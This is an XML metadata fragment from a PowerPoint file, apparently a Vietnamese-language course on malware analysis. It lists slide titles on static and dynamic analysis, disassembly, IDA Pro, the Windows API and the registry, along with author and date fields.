      <vt:lpstr>Unpacking</vt:lpstr>
      <vt:lpstr>Linked Libraries and Functions</vt:lpstr>
      <vt:lpstr>Linked Libraries and Functions</vt:lpstr>
      <vt:lpstr>Common DLLs</vt:lpstr>
      <vt:lpstr>Strings</vt:lpstr>
      <vt:lpstr>Strings</vt:lpstr>
      <vt:lpstr>Hash Function</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Analysis Environment</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Surface Analysis </vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Malware Analysis</vt:lpstr>
      <vt:lpstr>Faking a Network</vt:lpstr>
      <vt:lpstr>Faking a Network</vt:lpstr>
      <vt:lpstr>Network Monitoring</vt:lpstr>
      <vt:lpstr>Network Monitoring</vt:lpstr>
      <vt:lpstr>Network Monitoring</vt:lpstr>
      <vt:lpstr>Practice</vt:lpstr>
      <vt:lpstr>Static Analysis</vt:lpstr>
      <vt:lpstr>Static Analysis</vt:lpstr>
      <vt:lpstr>Static Analysis</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>IDA Pro</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nhận diện cấu trúc của chương trình C</vt:lpstr>
      <vt:lpstr>Phân tích mã độc CT Windows</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Networking API</vt:lpstr>
      <vt:lpstr>Networking API</vt:lpstr>
      <vt:lpstr>Networking API</vt:lpstr>
      <vt:lpstr>Các hình thức của một mã độc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mã độc</dc:title>
  <dc:creator>TTS</dc:creator>
  <cp:lastModifiedBy>tran the son</cp:lastModifiedBy>
  <cp:revision>619</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-08T06:53:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-10T07:14:57Z</dcterms:modified>
</cp:coreProperties>
</file>